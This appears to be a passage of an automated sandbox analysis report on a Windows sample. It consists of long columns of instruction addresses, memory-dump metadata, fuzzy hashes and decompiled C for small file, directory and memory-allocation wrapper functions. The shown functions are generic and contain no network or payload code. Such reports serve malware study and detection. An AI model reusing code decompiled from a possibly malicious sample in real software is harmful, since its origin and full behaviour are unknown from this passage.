                                                                    0x100024e8
                                                                    0x100024d5
                                                                    0x100024d5
                                                                    0x100024d5
                                                                    0x100024d7
                                                                    0x00000000
                                                                    0x100024d9
                                                                    0x100024d9
                                                                    0x100024d9
                                                                    0x100024de
                                                                    0x100024de
                                                                    0x100024d7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100024f0
                                                                    0x100024f0
                                                                    0x100024f3
                                                                    0x100024f6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100024fd
                                                                    0x100024fd
                                                                    0x10002500
                                                                    0x10002503
                                                                    0x10002505
                                                                    0x10002508
                                                                    0x1000250b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002513
                                                                    0x10002513
                                                                    0x10002516
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000251d
                                                                    0x1000251d
                                                                    0x1000251f
                                                                    0x10002521
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002529
                                                                    0x10002529
                                                                    0x1000252c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002534
                                                                    0x10002534
                                                                    0x10002539
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002541
                                                                    0x10002541
                                                                    0x10002544
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002632
                                                                    0x10002632
                                                                    0x10002634
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000254c
                                                                    0x1000254c
                                                                    0x1000254e
                                                                    0x10002551
                                                                    0x10002554
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000255b
                                                                    0x1000255b
                                                                    0x1000255c
                                                                    0x10002562
                                                                    0x10002564
                                                                    0x10002564
                                                                    0x10002564
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002565
                                                                    0x10002565
                                                                    0x10002568
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002570
                                                                    0x10002570
                                                                    0x10002572
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000257a
                                                                    0x1000257a
                                                                    0x1000257d
                                                                    0x10002580
                                                                    0x10002583
                                                                    0x10002585
                                                                    0x10002588
                                                                    0x1000258b
                                                                    0x1000258e
                                                                    0x10002591
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002599
                                                                    0x10002599
                                                                    0x10002599
                                                                    0x10002599
                                                                    0x1000259a
                                                                    0x1000259b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100025a1
                                                                    0x100025a1
                                                                    0x100025a1
                                                                    0x100025a1
                                                                    0x100025a2
                                                                    0x100025a3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100025a9
                                                                    0x100025a9
                                                                    0x100025ad
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100025b5
                                                                    0x100025b5
                                                                    0x100025b8
                                                                    0x100025ba
                                                                    0x100025ba
                                                                    0x100025ba
                                                                    0x100025bc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100025c4
                                                                    0x100025c4
                                                                    0x100025c7
                                                                    0x100025c9
                                                                    0x100025c9
                                                                    0x100025c9
                                                                    0x100025cb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100025d3
                                                                    0x100025d3
                                                                    0x100025d3
                                                                    0x100025d3
                                                                    0x100025d4
                                                                    0x100025d5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100025db
                                                                    0x100025db
                                                                    0x100025db
                                                                    0x100025db
                                                                    0x100025dc
                                                                    0x100025dd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100025e3
                                                                    0x100025e3
                                                                    0x100025e3
                                                                    0x100025e3
                                                                    0x100025e4
                                                                    0x100025e5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100025eb
                                                                    0x100025eb
                                                                    0x100025eb
                                                                    0x100025eb
                                                                    0x100025ec
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100025f3
                                                                    0x100025f3
                                                                    0x100025f3
                                                                    0x100025f3
                                                                    0x100025f4
                                                                    0x100025f5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100025fb
                                                                    0x100025fb
                                                                    0x100025fd
                                                                    0x100025ff
                                                                    0x10002601
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002609
                                                                    0x10002609
                                                                    0x1000260b
                                                                    0x1000260d
                                                                    0x1000260f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002617
                                                                    0x10002617
                                                                    0x10002619
                                                                    0x1000261b
                                                                    0x1000261e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002626
                                                                    0x10002626
                                                                    0x10002628
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002630
                                                                    0x10002630
                                                                    0x10002630
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000263c
                                                                    0x1000263c
                                                                    0x1000263e
                                                                    0x10002643
                                                                    0x10002644
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000264b
                                                                    0x1000264b
                                                                    0x1000264d
                                                                    0x1000264e
                                                                    0x10002650
                                                                    0x10002652
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000265a
                                                                    0x1000265a
                                                                    0x1000265c
                                                                    0x10002661
                                                                    0x10002662
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002669
                                                                    0x10002669
                                                                    0x1000266b
                                                                    0x1000266d
                                                                    0x1000266f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002677
                                                                    0x10002677
                                                                    0x10002679
                                                                    0x1000267b
                                                                    0x1000267d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002685
                                                                    0x10002685
                                                                    0x10002687
                                                                    0x1000268a
                                                                    0x1000268c
                                                                    0x1000268e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002696
                                                                    0x10002696
                                                                    0x10002698
                                                                    0x1000269a
                                                                    0x1000269a
                                                                    0x1000269a
                                                                    0x1000269c
                                                                    0x1000269e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100026a6
                                                                    0x100026a6
                                                                    0x100026a8
                                                                    0x100026aa
                                                                    0x100026aa
                                                                    0x100026aa
                                                                    0x100026ac
                                                                    0x100026ae
                                                                    0x100026b0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100026b8
                                                                    0x100026b8
                                                                    0x100026ba
                                                                    0x100026bc
                                                                    0x100026be
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100026c6
                                                                    0x100026c6
                                                                    0x100026c8
                                                                    0x100026ca
                                                                    0x100026cc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100026d4
                                                                    0x100026d4
                                                                    0x100026d6
                                                                    0x100026d8
                                                                    0x100026da
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100026e2
                                                                    0x100026e2
                                                                    0x100026e4
                                                                    0x100026e6
                                                                    0x100026e8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100026f0
                                                                    0x100026f0
                                                                    0x100026f2
                                                                    0x100026f4
                                                                    0x100026f6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100026fe
                                                                    0x100026fe
                                                                    0x10002701
                                                                    0x10002706
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002710
                                                                    0x10002710
                                                                    0x10002713
                                                                    0x10002716
                                                                    0x10002719
                                                                    0x1000272a
                                                                    0x1000272d
                                                                    0x1000272f
                                                                    0x1000271b
                                                                    0x1000271b
                                                                    0x1000271d
                                                                    0x10002720
                                                                    0x10002723
                                                                    0x10002723
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002736
                                                                    0x10002736
                                                                    0x10002739
                                                                    0x1000273c
                                                                    0x1000273f
                                                                    0x10002756
                                                                    0x10002757
                                                                    0x10002741
                                                                    0x10002741
                                                                    0x10002741
                                                                    0x10002743
                                                                    0x10002746
                                                                    0x10002748
                                                                    0x00000000
                                                                    0x1000274a
                                                                    0x1000274a
                                                                    0x1000274c
                                                                    0x1000274c
                                                                    0x10002748
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002761
                                                                    0x10002761
                                                                    0x10002764
                                                                    0x1000276a
                                                                    0x1000276d
                                                                    0x10002770
                                                                    0x10002773
                                                                    0x10002776
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000277d
                                                                    0x1000277d
                                                                    0x10002780
                                                                    0x10002783
                                                                    0x10002786
                                                                    0x10002788
                                                                    0x1000278b
                                                                    0x1000278e
                                                                    0x10002793
                                                                    0x10002795
                                                                    0x10002797
                                                                    0x1000279a
                                                                    0x1000279c
                                                                    0x1000279f
                                                                    0x100027a1
                                                                    0x100027a3
                                                                    0x100027a6
                                                                    0x100027ac
                                                                    0x100027af
                                                                    0x100027b1
                                                                    0x100027b3
                                                                    0x100027b6
                                                                    0x100027bc
                                                                    0x100027bf
                                                                    0x100027c1
                                                                    0x100027c3
                                                                    0x100027c6
                                                                    0x10002326
                                                                    0x10002326
                                                                    0x10002329
                                                                    0x1000232c
                                                                    0x1000232f
                                                                    0x10002332
                                                                    0x10002335
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100027ce
                                                                    0x100027ce
                                                                    0x100027d1
                                                                    0x100027d4
                                                                    0x100027d7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100027df
                                                                    0x100027df
                                                                    0x100027e2
                                                                    0x100027e5
                                                                    0x100027e8
                                                                    0x100027eb
                                                                    0x100027ee
                                                                    0x100027f1
                                                                    0x100027f8
                                                                    0x100027ff
                                                                    0x10002801
                                                                    0x10002803
                                                                    0x10002808
                                                                    0x1000280b
                                                                    0x1000280e
                                                                    0x10002812
                                                                    0x10002814
                                                                    0x10002817
                                                                    0x10002819
                                                                    0x10002820
                                                                    0x10002825
                                                                    0x10002828
                                                                    0x1000282b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002833
                                                                    0x10002833
                                                                    0x10002836
                                                                    0x10002839
                                                                    0x1000283b
                                                                    0x1000283e
                                                                    0x10002841
                                                                    0x10002844
                                                                    0x10002847
                                                                    0x10002849
                                                                    0x1000284b
                                                                    0x1000284e
                                                                    0x10002851
                                                                    0x10002859
                                                                    0x1000285b
                                                                    0x1000285d
                                                                    0x10002860
                                                                    0x10002860
                                                                    0x10002864
                                                                    0x10002864
                                                                    0x10002869
                                                                    0x1000286c
                                                                    0x1000286f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100022cd
                                                                    0x100022d0
                                                                    0x100022d3
                                                                    0x100022e3
                                                                    0x100022e5
                                                                    0x100022e7
                                                                    0x100022ec
                                                                    0x100022ef
                                                                    0x100022f4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002877
                                                                    0x10002877
                                                                    0x1000287a
                                                                    0x1000287d
                                                                    0x10002880
                                                                    0x10002882
                                                                    0x10002885
                                                                    0x10002887
                                                                    0x1000288a
                                                                    0x1000288d
                                                                    0x10002890
                                                                    0x10002892
                                                                    0x10002894
                                                                    0x10002896
                                                                    0x10002896
                                                                    0x10002898
                                                                    0x10002898
                                                                    0x10002898
                                                                    0x1000289b
                                                                    0x1000289e
                                                                    0x100028a1
                                                                    0x100028a4
                                                                    0x100028a4
                                                                    0x100028a4
                                                                    0x10002898
                                                                    0x100028a7
                                                                    0x100028a7
                                                                    0x100028aa
                                                                    0x100028ad
                                                                    0x100028b3
                                                                    0x100028b6
                                                                    0x100028b9
                                                                    0x100028bc
                                                                    0x100028be
                                                                    0x100028c0
                                                                    0x100028c7
                                                                    0x100028ca
                                                                    0x100028ca
                                                                    0x100028ca
                                                                    0x100028cd
                                                                    0x100028d0
                                                                    0x100028d2
                                                                    0x100028d5
                                                                    0x100028d8
                                                                    0x100028db
                                                                    0x100028de
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100028e6
                                                                    0x100028e6
                                                                    0x100028e9
                                                                    0x10002b5f
                                                                    0x10002b5f
                                                                    0x10002b62
                                                                    0x10002b64
                                                                    0x10002b66
                                                                    0x10002b6a
                                                                    0x10002b74
                                                                    0x10002b74
                                                                    0x10002b78
                                                                    0x10002b78
                                                                    0x10002b7d
                                                                    0x10002b7d
                                                                    0x10002b81
                                                                    0x10002b86
                                                                    0x10002b87
                                                                    0x10002b88
                                                                    0x10002b8d
                                                                    0x10002b8e
                                                                    0x10002b90
                                                                    0x10002b91
                                                                    0x100028ef
                                                                    0x100028ef
                                                                    0x100028ef
                                                                    0x100028f4
                                                                    0x100028f6
                                                                    0x100028f8
                                                                    0x100028f9
                                                                    0x100028f9
                                                                    0x100028fb
                                                                    0x100028fe
                                                                    0x10002902
                                                                    0x10002905
                                                                    0x10002907
                                                                    0x10002907
                                                                    0x10002909
                                                                    0x1000290c
                                                                    0x1000290e
                                                                    0x1000290e
                                                                    0x10002915
                                                                    0x10002917
                                                                    0x10002918
                                                                    0x1000291c
                                                                    0x1000291c
                                                                    0x1000290e
                                                                    0x10002920
                                                                    0x10002920
                                                                    0x10002927
                                                                    0x10002929
                                                                    0x1000292c
                                                                    0x1000292e
                                                                    0x1000292e
                                                                    0x10002930
                                                                    0x10002933
                                                                    0x10002937
                                                                    0x10002937
                                                                    0x10002927
                                                                    0x1000293c
                                                                    0x1000293c
                                                                    0x1000293f
                                                                    0x10002941
                                                                    0x10002943
                                                                    0x10002947
                                                                    0x10002951
                                                                    0x10002955
                                                                    0x1000295a
                                                                    0x1000295d
                                                                    0x10002960
                                                                    0x10002963
                                                                    0x10002963
                                                                    0x10002965
                                                                    0x10002965
                                                                    0x10002968
                                                                    0x00000000
                                                                    0x10002968
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100022c6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000296d
                                                                    0x1000296d
                                                                    0x1000296e
                                                                    0x10002971
                                                                    0x10002971
                                                                    0x1000297a
                                                                    0x1000297f
                                                                    0x1000298d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002995
                                                                    0x10002998
                                                                    0x1000299d
                                                                    0x1000299f
                                                                    0x100029a1
                                                                    0x100029a4
                                                                    0x100029a5
                                                                    0x100029aa
                                                                    0x100029af
                                                                    0x100029af
                                                                    0x100029b2
                                                                    0x100029b5
                                                                    0x100029b7
                                                                    0x100029ba
                                                                    0x100029bf
                                                                    0x100029c2
                                                                    0x100029c4
                                                                    0x100029c6
                                                                    0x100029c9
                                                                    0x100029cc
                                                                    0x100029cf
                                                                    0x100029d2
                                                                    0x100029d4
                                                                    0x100029d6
                                                                    0x100029dd
                                                                    0x100029df
                                                                    0x100029e3
                                                                    0x100029e6
                                                                    0x100029e9
                                                                    0x100029ef
                                                                    0x10002a0a
                                                                    0x10002a0c
                                                                    0x10002a0f
                                                                    0x10002a12
                                                                    0x10002a15
                                                                    0x10002a18
                                                                    0x10002a1b
                                                                    0x10002a1b
                                                                    0x10002a1d
                                                                    0x100029f1
                                                                    0x100029f1
                                                                    0x100029f8
                                                                    0x100029f9
                                                                    0x100029fe
                                                                    0x10002a00
                                                                    0x10002a02
                                                                    0x10002a05
                                                                    0x10002a05
                                                                    0x10002a20
                                                                    0x10002a23
                                                                    0x10002a25
                                                                    0x10002a28
                                                                    0x10002a2b
                                                                    0x10002a2e
                                                                    0x10002a31
                                                                    0x10002a35
                                                                    0x10002a38
                                                                    0x10002a3a
                                                                    0x10002a42
                                                                    0x10002a42
                                                                    0x10002a44
                                                                    0x10002a47
                                                                    0x10002a4c
                                                                    0x10002a4c
                                                                    0x10002a51
                                                                    0x10002a54
                                                                    0x10002a56
                                                                    0x10002a66
                                                                    0x10002a6b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10002b2a
                                                                    0x10002b2a
                                                                    0x10002b2d
                                                                    0x10002b32
                                                                    0x10002b35
                                                                    0x10002b3b
                                                                    0x10002b3e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100022a7
                                                                    0x00000000
                                                                    0x1000228d
                                                                    0x10002b46
                                                                    0x10002b46
                                                                    0x10002b47
                                                                    0x10002b4c
                                                                    0x10002b5c
                                                                    0x10002b5c

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 880c007e9fc92a07e8f22be8c8de1945a245b6134a3ba7f8b93c25380affa960
                                                                    • Instruction ID: 531355096d3f714bfa36a90036cff5c6a1bd243fed94c587f193591dac95b274
                                                                    • Opcode Fuzzy Hash: 880c007e9fc92a07e8f22be8c8de1945a245b6134a3ba7f8b93c25380affa960
                                                                    • Instruction Fuzzy Hash: 70219DB0A00646EFEB10CF64D49469EBBF1FF09394B10C169E85A9B705D730EAA0CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 10005AF0, Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E10005AF0(CHAR** _a4, signed int _a8) {
				signed int _t5;
				signed int _t10;
				long _t18;

				_t5 = _a8;
				if((_t5 & 0x00000004) == 0) {
					asm("sbb ecx, ecx");
					_t18 =  ~( ~(_t5 & 0x00000008)) + 3;
				} else {
					_t18 = 2;
				}
				asm("sbb edx, edx");
				_t10 = CreateFileA( *_a4, ( !_t5 | 0xfffffffe) << 0x1e, ( ~(_t5 & 0x00000002) & 0xfffffffd) + 3, 0, _t18, 0, 0); // executed
				asm("sbb eax, eax");
				return  ~(_t10 + 1) & _t10;
			}






                                                                    0x10005af0
                                                                    0x10005af6
                                                                    0x10005b06
                                                                    0x10005b0a
                                                                    0x10005af8
                                                                    0x10005af8
                                                                    0x10005af8
                                                                    0x10005b18
                                                                    0x10005b34
                                                                    0x10005b3f
                                                                    0x10005b43

                                                                    APIs
                                                                    • CreateFileA.KERNEL32(1000D329,1000D32C,1000D329,00000000,1000D329,00000000,00000000,10005CC3,1000D32C,00000006,1000D32C,00000000,00000000,?,1000D32C,10006518), ref: 10005B34
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 3659d475e362d335d01b14539a5f81eace271aecee077a4a36492414b6550c6b
                                                                    • Instruction ID: 87c82cc404fc1d1b93a748627a3eef174cd00deefbb92a33f0e9bf067a698d98
                                                                    • Opcode Fuzzy Hash: 3659d475e362d335d01b14539a5f81eace271aecee077a4a36492414b6550c6b
                                                                    • Instruction Fuzzy Hash: 5FF065717A05055FF708CA78CC92F7A73C6D7C2766F04D72CB563C62D5DA6898458710
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 10005F90, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E10005F90(char* _a4, char* _a8, int _a12) {
				signed int _t7;

				_t7 = CompareStringA(0x400, 1, _a4, _a12, _a8, _a12); // executed
				if(_t7 != 1) {
					return 0 | _t7 == 0x00000003;
				} else {
					return _t7 | 0xffffffff;
				}
			}




                                                                    0x10005fa7
                                                                    0x10005fb0
                                                                    0x10005fc2
                                                                    0x10005fb2
                                                                    0x10005fb5
                                                                    0x10005fb5

                                                                    APIs
                                                                    • CompareStringA.KERNEL32(00000400,00000001,?,?,?,?), ref: 10005FA7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CompareString
                                                                    • String ID:
                                                                    • API String ID: 1825529933-0
                                                                    • Opcode ID: dc59a5c634376777b60424da985bbba5271a00ec94fd7bbd9c112320441256eb
                                                                    • Instruction ID: c3ee73b0c24b31814485c126e6f452742adc99081cf66c7f51e3c927bee69803
                                                                    • Opcode Fuzzy Hash: dc59a5c634376777b60424da985bbba5271a00ec94fd7bbd9c112320441256eb
                                                                    • Instruction Fuzzy Hash: 35D0E2BA214200AAE20486208885E2FA759E7D07A1F20CA0DF552C21D0C6B0DC408621
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 10005BC0, Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E10005BC0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t9;
				long _t12;

				_t12 = _a12;
				_t7 = WriteFile(_a4, _a8, _t12,  &_a12, 0); // executed
				if(_t7 == 0) {
					L2:
					return 0;
				}
				_t9 = _a12;
				if(_t9 != _t12) {
					goto L2;
				}
				return _t9;
			}






                                                                    0x10005bc9
                                                                    0x10005bd7
                                                                    0x10005bdf
                                                                    0x10005be9
                                                                    0x00000000
                                                                    0x10005be9
                                                                    0x10005be1
                                                                    0x10005be7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10005bec

                                                                    APIs
                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000,?,1000567B,00000000,?,?,00000000,00000006,000007E0,?,?,?), ref: 10005BD7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: 10d4c48fe2f257aa3f376171600596026bbae0a9fdc2413f1b194d112be2c3b3
                                                                    • Instruction ID: 72ae423c7c48a8c428be45600094529c93f2317880e56116f5c1fd3dc26f2978
                                                                    • Opcode Fuzzy Hash: 10d4c48fe2f257aa3f376171600596026bbae0a9fdc2413f1b194d112be2c3b3
                                                                    • Instruction Fuzzy Hash: 10E0E235208322ABE240CB61DC85EABB7E8FB84A90F048D0EB490C3188D330FC45CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 10005960, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E10005960(CHAR** _a4) {
				int _t3;

				_t3 = CreateDirectoryA( *_a4, 0); // executed
				return _t3;
			}




                                                                    0x10005969
                                                                    0x1000596f

                                                                    APIs
                                                                    • CreateDirectoryA.KERNEL32(?,00000000,10005D54,1000D32C,1000D32C,1000D32C,-00000004,1000D32C,1000D32C,00000006,1000D32C,00000000,00000000,?,1000D32C,10006518), ref: 10005969
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateDirectory
                                                                    • String ID:
                                                                    • API String ID: 4241100979-0
                                                                    • Opcode ID: c10dd83b603b1675711886ef5e216319622d4f2186c3a64ab17e7529833a8229
                                                                    • Instruction ID: 85e45307c5f3ba5fa496d9109c6968c8a2fd2daeb29098098dbc9facdb212021
                                                                    • Opcode Fuzzy Hash: c10dd83b603b1675711886ef5e216319622d4f2186c3a64ab17e7529833a8229
                                                                    • Instruction Fuzzy Hash: E2B012B1200200AFD204CB50C994F077360BBD9700F008918F305CB094C635D844CB10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 10005980, Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E10005980(CHAR** _a4) {
				int _t3;

				_t3 = RemoveDirectoryA( *_a4); // executed
				return _t3;
			}




                                                                    0x10005987
                                                                    0x1000598d

                                                                    APIs
                                                                    • RemoveDirectoryA.KERNEL32(?,10005A80,?,?), ref: 10005987
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DirectoryRemove
                                                                    • String ID:
                                                                    • API String ID: 597925465-0
                                                                    • Opcode ID: e6a0045e4a7a2b5587952e67f46e3606ab45a050d6deb287eb5d986bf89090c5
                                                                    • Instruction ID: 12a01fa5a8db9371b8e58903829511990cfacd9d3e1f2d2ec9e6753e2fb720dc
                                                                    • Opcode Fuzzy Hash: e6a0045e4a7a2b5587952e67f46e3606ab45a050d6deb287eb5d986bf89090c5
                                                                    • Instruction Fuzzy Hash: B5B012B0100100DFD204CB10C584C0673A0BBD93007008518F10183214C634DC00CA20
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 100038C0, Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E100038C0(signed int _a4) {
				signed int _t11;
				void* _t13;
				intOrPtr _t18;
				void** _t20;
				signed int _t22;

				_t11 = _a4;
				_t22 = 0x40000 << _t11 >> 5;
				_t18 =  *0x1000d300; // 0x23223f0
				_t20 = _t18 + (_t11 + _t11 * 4) * 4;
				_t6 = _t22 + 0x3fc; // 0x403fc
				_t13 = malloc(_t6); // executed
				 *_t20 = _t13;
				if(_t13 != 0) {
					_t20[1] = _t13;
					_t20[2] = 0x40000;
					_t20[3] = _t22;
					_t20[4] = 0;
					E10003FB0(_t13, 0xff);
					return 1;
				} else {
					return _t13;
				}
			}








                                                                    0x100038c0
                                                                    0x100038cf
                                                                    0x100038d1
                                                                    0x100038db
                                                                    0x100038de
                                                                    0x100038e5
                                                                    0x100038ed
                                                                    0x100038f1
                                                                    0x100038fe
                                                                    0x10003901
                                                                    0x10003904
                                                                    0x10003907
                                                                    0x1000390e
                                                                    0x1000391a
                                                                    0x100038f5
                                                                    0x100038f5
                                                                    0x100038f5

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: malloc
                                                                    • String ID:
                                                                    • API String ID: 2803490479-0
                                                                    • Opcode ID: 9b5fb2fde61c963a9065f80053a4989916ca2246b3493a75608c5e8d6db28dcf
                                                                    • Instruction ID: cee3fbfabc76a55cf89959beb2690333f67805e97c05a8911fcac20925ee8c72
                                                                    • Opcode Fuzzy Hash: 9b5fb2fde61c963a9065f80053a4989916ca2246b3493a75608c5e8d6db28dcf
                                                                    • Instruction Fuzzy Hash: F5F05EB6A006176BD310CF1CE841BD6F3E8EB94358F01853AF219D7644DBB0A955CBD0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401C20, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00401C20(long _a4) {
				void* _t3;

				_t3 = VirtualAlloc(0, _a4, 0x3000, 4); // executed
				return _t3;
			}




                                                                    0x00401c2e
                                                                    0x00401c34

                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,004019C2,-00000400,?,?,00000000), ref: 00401C2E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.322893653.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
